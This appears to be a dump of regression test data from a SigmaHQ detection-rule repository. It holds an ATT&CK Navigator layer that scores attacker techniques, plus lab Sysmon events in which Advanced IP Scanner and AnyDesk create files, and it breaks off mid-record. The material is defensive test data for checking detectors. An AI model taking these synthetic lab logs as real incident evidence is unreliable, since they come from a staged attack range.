"", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1552.002", "tactic": "credential-access", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1072", "tactic": "execution", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1072", "tactic": "lateral-movement", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1218.008", "tactic": "defense-evasion", "score": 8, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1048.001", "tactic": "exfiltration", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1132.001", "tactic": "command-and-control", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.001", "tactic": "persistence", "score": 39, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.001", "tactic": "privilege-escalation", "score": 39, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1505.005", "tactic": "persistence", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1556.002", "tactic": "credential-access", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1556.002", "tactic": "defense-evasion", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { 
"techniqueID": "T1556.002", "tactic": "persistence", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.008", "tactic": "privilege-escalation", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.008", "tactic": "persistence", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.007", "tactic": "privilege-escalation", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.007", "tactic": "persistence", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.014", "tactic": "persistence", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.014", "tactic": "privilege-escalation", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.010", "tactic": "persistence", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.010", "tactic": "privilege-escalation", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.002", "tactic": "persistence", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.002", "tactic": "privilege-escalation", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1564.006", "tactic": "defense-evasion", "score": 2, 
"color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1069.002", "tactic": "discovery", "score": 15, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1053.005", "tactic": "execution", "score": 51, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1053.005", "tactic": "persistence", "score": 51, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1053.005", "tactic": "privilege-escalation", "score": 51, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1027.005", "tactic": "defense-evasion", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1218.002", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546", "tactic": "privilege-escalation", "score": 10, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546", "tactic": "persistence", "score": 10, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1204.004", "tactic": "execution", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1027.010", "tactic": "defense-evasion", "score": 8, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1562.010", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], 
"showSubtechniques": false }, { "techniqueID": "T1134.002", "tactic": "defense-evasion", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1134.002", "tactic": "privilege-escalation", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1219", "tactic": "command-and-control", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1218.013", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1564.003", "tactic": "defense-evasion", "score": 8, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1555.003", "tactic": "credential-access", "score": 8, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547", "tactic": "persistence", "score": 7, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547", "tactic": "privilege-escalation", "score": 7, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1218.007", "tactic": "defense-evasion", "score": 10, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574.005", "tactic": "persistence", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574.005", "tactic": "privilege-escalation", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574.005", "tactic": 
"defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1491.001", "tactic": "impact", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.001", "tactic": "privilege-escalation", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.001", "tactic": "persistence", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1608", "tactic": "resource-development", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1539", "tactic": "credential-access", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1211", "tactic": "defense-evasion", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1563.002", "tactic": "lateral-movement", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1552.006", "tactic": "credential-access", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1560", "tactic": "collection", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1505.002", "tactic": "persistence", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1542.001", "tactic": "persistence", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": 
[], "showSubtechniques": false }, { "techniqueID": "T1542.001", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1176.001", "tactic": "persistence", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1649", "tactic": "credential-access", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1555.004", "tactic": "credential-access", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1553.005", "tactic": "defense-evasion", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1569", "tactic": "execution", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1120", "tactic": "discovery", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1542.003", "tactic": "persistence", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1542.003", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1614.001", "tactic": "discovery", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1484.001", "tactic": "defense-evasion", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1484.001", "tactic": "privilege-escalation", "score": 
6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1021.005", "tactic": "lateral-movement", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1119", "tactic": "collection", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1590.001", "tactic": "reconnaissance", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.015", "tactic": "privilege-escalation", "score": 9, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.015", "tactic": "persistence", "score": 9, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1134", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1134", "tactic": "privilege-escalation", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1134.003", "tactic": "defense-evasion", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1134.003", "tactic": "privilege-escalation", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574", "tactic": "persistence", "score": 8, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574", "tactic": "privilege-escalation", "score": 8, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], 
"showSubtechniques": false }, { "techniqueID": "T1574", "tactic": "defense-evasion", "score": 8, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1039", "tactic": "collection", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1570", "tactic": "lateral-movement", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1216.001", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1036.004", "tactic": "defense-evasion", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1110.001", "tactic": "credential-access", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1036.002", "tactic": "defense-evasion", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1110.002", "tactic": "credential-access", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1222.001", "tactic": "defense-evasion", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1217", "tactic": "discovery", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1622", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1622", "tactic": "discovery", "score": 1, "color": 
"", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1134.004", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1134.004", "tactic": "privilege-escalation", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1059.006", "tactic": "execution", "score": 8, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1036.007", "tactic": "defense-evasion", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1620", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1069", "tactic": "discovery", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1070.005", "tactic": "defense-evasion", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1037.001", "tactic": "persistence", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1037.001", "tactic": "privilege-escalation", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1135", "tactic": "discovery", "score": 7, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1185", "tactic": "collection", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { 
"techniqueID": "T1505.004", "tactic": "persistence", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1003.006", "tactic": "credential-access", "score": 7, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1006", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.013", "tactic": "privilege-escalation", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.013", "tactic": "persistence", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1137", "tactic": "persistence", "score": 9, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1008", "tactic": "command-and-control", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1137.006", "tactic": "persistence", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1136.002", "tactic": "persistence", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.009", "tactic": "persistence", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.009", "tactic": "privilege-escalation", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1137.003", "tactic": "persistence", "score": 1, "color": "", "comment": "", 
"enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1195", "tactic": "initial-access", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.015", "tactic": "persistence", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.015", "tactic": "privilege-escalation", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1001.003", "tactic": "command-and-control", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1114.001", "tactic": "collection", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1222", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1589.002", "tactic": "reconnaissance", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574.012", "tactic": "persistence", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574.012", "tactic": "privilege-escalation", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574.012", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.010", "tactic": "privilege-escalation", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { 
"techniqueID": "T1546.010", "tactic": "persistence", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1125", "tactic": "collection", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.009", "tactic": "privilege-escalation", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.009", "tactic": "persistence", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.008", "tactic": "persistence", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.008", "tactic": "privilege-escalation", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.005", "tactic": "persistence", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.005", "tactic": "privilege-escalation", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1553.003", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.003", "tactic": "persistence", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.003", "tactic": "privilege-escalation", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.012", "tactic": "privilege-escalation", "score": 2, "color": 
"", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.012", "tactic": "persistence", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1559.002", "tactic": "execution", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1550.002", "tactic": "defense-evasion", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1550.002", "tactic": "lateral-movement", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1553.002", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1207", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1010", "tactic": "discovery", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1134.005", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1134.005", "tactic": "privilege-escalation", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1200", "tactic": "initial-access", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1557.003", "tactic": "credential-access", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, 
{ "techniqueID": "T1557.003", "tactic": "collection", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1091", "tactic": "lateral-movement", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1091", "tactic": "initial-access", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1590.002", "tactic": "reconnaissance", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1499.001", "tactic": "impact", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1176", "tactic": "persistence", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1595.001", "tactic": "reconnaissance", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1548.003", "tactic": "privilege-escalation", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1548.003", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1559", "tactic": "execution", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1564.008", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1090.004", "tactic": "command-and-control", "score": 1, "color": "", "comment": "", 
"enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1598.002", "tactic": "reconnaissance", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1036.008", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1070.008", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false } ] } ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:36:29.111126Z" } }, "EventRecordID": 18267, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:36:29.110", "ProcessGuid": "5AA13A44-0D74-68FC-EB1D-000000004002", "ProcessId": 5624, "Image": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\is-3C3LU.tmp\\Advanced_IP_Scanner_2.5.4594.1(1).tmp", "TargetFilename": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Advanced IP Scanner 2\\platforms\\qwindows.dll", "CreationUtcTime": "2025-10-24 10:44:35.897", "User": "ATTACKRANGE\\Administrator" } } } 
================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml ================================================ id: 48ff85e7-a8ae-43fd-8a8f-16ce51a92183 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: fed85bf9-e075-4280-9159-fbe8a023d6fa title: Advanced IP Scanner - File Event regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:34:34.640670Z" } }, "EventRecordID": 14961, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:34:34.634", "ProcessGuid": "5AA13A44-0D08-68FC-DC1D-000000004002", "ProcessId": 7760, "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\service.conf.new", "CreationUtcTime": "2025-10-24 23:34:32.457", "User": "ATTACKRANGE\\Administrator" } } } { "Event": { "#attributes": { "xmlns": 
"http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:34:34.644616Z" } }, "EventRecordID": 14963, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:34:34.634", "ProcessGuid": "5AA13A44-0D08-68FC-DC1D-000000004002", "ProcessId": 7760, "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\service.conf~RF2d9c1fe.TMP", "CreationUtcTime": "2025-10-24 23:34:34.634", "User": "ATTACKRANGE\\Administrator" } } } { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:34:34.649129Z" } }, "EventRecordID": 14985, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:34:34.645", "ProcessGuid": "5AA13A44-0D08-68FC-DD1D-000000004002", "ProcessId": 9612, "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", "TargetFilename": 
